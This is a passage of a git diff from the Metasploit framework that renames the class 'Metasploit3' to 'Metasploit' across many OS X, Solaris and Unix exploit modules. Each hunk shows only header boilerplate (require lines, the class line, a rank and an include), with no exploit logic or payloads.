+5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb index b3f464b21a..1325b10cb3 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index d360a35626..155a0f5e0d 100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index fe08b1e373..c387fdef09 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index c61f1ceb23..8c4bb3770f 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index 2e4a586b97..f4dab44a5e 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/local/iokit_keyboard_root.rb b/modules/exploits/osx/local/iokit_keyboard_root.rb index e0b2c5f914..99742b8535 100644 --- a/modules/exploits/osx/local/iokit_keyboard_root.rb +++ b/modules/exploits/osx/local/iokit_keyboard_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ManualRanking # Can cause kernel crash include Msf::Post::File diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index c4683889ab..5216b0dbd9 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/local/persistence.rb b/modules/exploits/osx/local/persistence.rb index 260632a90d..d34949efa3 100644 --- a/modules/exploits/osx/local/persistence.rb +++ b/modules/exploits/osx/local/persistence.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index fe54af173c..5dbbcc8fd9 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local # ManualRanking because it's going to modify system time # Even when it will try to restore things, user should use diff --git a/modules/exploits/osx/local/vmware_bash_function_root.rb b/modules/exploits/osx/local/vmware_bash_function_root.rb index ff20c7fe02..f9a7f0fe88 100644 --- a/modules/exploits/osx/local/vmware_bash_function_root.rb +++ b/modules/exploits/osx/local/vmware_bash_function_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb index 3d32b05a7c..c0cc7bb915 100644 --- a/modules/exploits/osx/mdns/upnp_location.rb +++ b/modules/exploits/osx/mdns/upnp_location.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb index 82404e2244..5fe34eb28e 100644 --- a/modules/exploits/osx/misc/ufo_ai.rb +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index e9e228911d..5e17b1562e 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index 3eca9265e6..28e59313d3 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index bcd15fbb39..7aa37760dd 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index ecf0331613..c65d088af2 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index f71bdad36d..424cf6c4d4 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 4445b77033..5946494f17 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index 926c665dce..68f6a06c4e 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 0a6caf1ee7..2fa2bdf008 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index 5326f8d851..1da2ec1e05 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 184c225c90..57ed43354d 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index bafae78d1e..a69025a50e 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 36c43eb15d..61c0b1ca7b 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb index e3e6f56fad..6a3ed6d6f9 100644 --- a/modules/exploits/unix/dhcp/bash_environment.rb +++ b/modules/exploits/unix/dhcp/bash_environment.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DHCPServer diff --git a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb index 71a4fd8416..51ae6ebd8d 100644 --- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb +++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index 0e39c322d6..ba9bf43cf6 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index ce6388be3e..269018fa7c 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index b5a5b70f1f..ae8705acec 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/ctek_skyrouter.rb b/modules/exploits/unix/http/ctek_skyrouter.rb index ff6c6bb7a9..5753ad6c74 100644 --- a/modules/exploits/unix/http/ctek_skyrouter.rb +++ b/modules/exploits/unix/http/ctek_skyrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb index cb85ffd2a2..711e3872ea 100644 --- a/modules/exploits/unix/http/freepbx_callmenum.rb +++ b/modules/exploits/unix/http/freepbx_callmenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index 8a06f2b6b2..f88134ba9b 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/twiki_debug_plugins.rb b/modules/exploits/unix/http/twiki_debug_plugins.rb index 53f4b48af4..ad91b5daa8 100644 --- a/modules/exploits/unix/http/twiki_debug_plugins.rb +++ b/modules/exploits/unix/http/twiki_debug_plugins.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb index 1b2de6b94b..21c22ed42a 100644 --- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb +++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb index c9a00bc53e..b4962d0b73 100644 --- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb +++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index 6a4c335ca5..c7ee8184fa 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/qnx_qconn_exec.rb b/modules/exploits/unix/misc/qnx_qconn_exec.rb index 9bdeb95f3d..465a27d66f 100644 --- a/modules/exploits/unix/misc/qnx_qconn_exec.rb +++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 1445b92a9c..1a7b3ad1e8 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/xerox_mfp.rb b/modules/exploits/unix/misc/xerox_mfp.rb index 64b8255efb..a99e9e8ae6 100644 --- a/modules/exploits/unix/misc/xerox_mfp.rb +++ b/modules/exploits/unix/misc/xerox_mfp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/zabbix_agent_exec.rb b/modules/exploits/unix/misc/zabbix_agent_exec.rb index 7498d4486e..525ceb905f 100644 --- a/modules/exploits/unix/misc/zabbix_agent_exec.rb +++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index c504ba9392..eed636b17b 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb index a985514797..75e60c862f 100644 --- a/modules/exploits/unix/smtp/exim4_string_format.rb +++ b/modules/exploits/unix/smtp/exim4_string_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 02376c7c19..ccc863596d 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 5c1510028b..64635f4d55 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index 99d0bc71fd..527d17a2da 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index c97f321c9a..ed3e8d6890 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index bc273029c4..6cf88012ac 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index 516bac7a51..d752000e66 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index de4f73f6b2..184dc87ac4 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index ce3cf84b4a..43e45e7212 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index 574db617bd..5ee0918217 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/basilic_diff_exec.rb b/modules/exploits/unix/webapp/basilic_diff_exec.rb index 3dcef095f8..cfa0ba23e2 100644 --- a/modules/exploits/unix/webapp/basilic_diff_exec.rb +++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 66ab5cdf4e..3aac9af56a 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb index 045be447c2..0ad447ed55 100644 --- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb +++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb index 66e4aed547..5842ee5913 100644 --- a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb +++ b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb index 0e8aad113d..2e82d3d81d 100644 --- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb +++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index 2c98d91f63..b291497fe4 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 948a9108db..d4bb0dac5c 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index d39e728937..44ddf3570b 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 7ae0f83833..95d10db9a4 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index 8b24944c6f..a6a84c48fb 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index 6324068bf5..7204a9b477 100644 --- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index 0cb8ac52d9..6313b31b58 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < 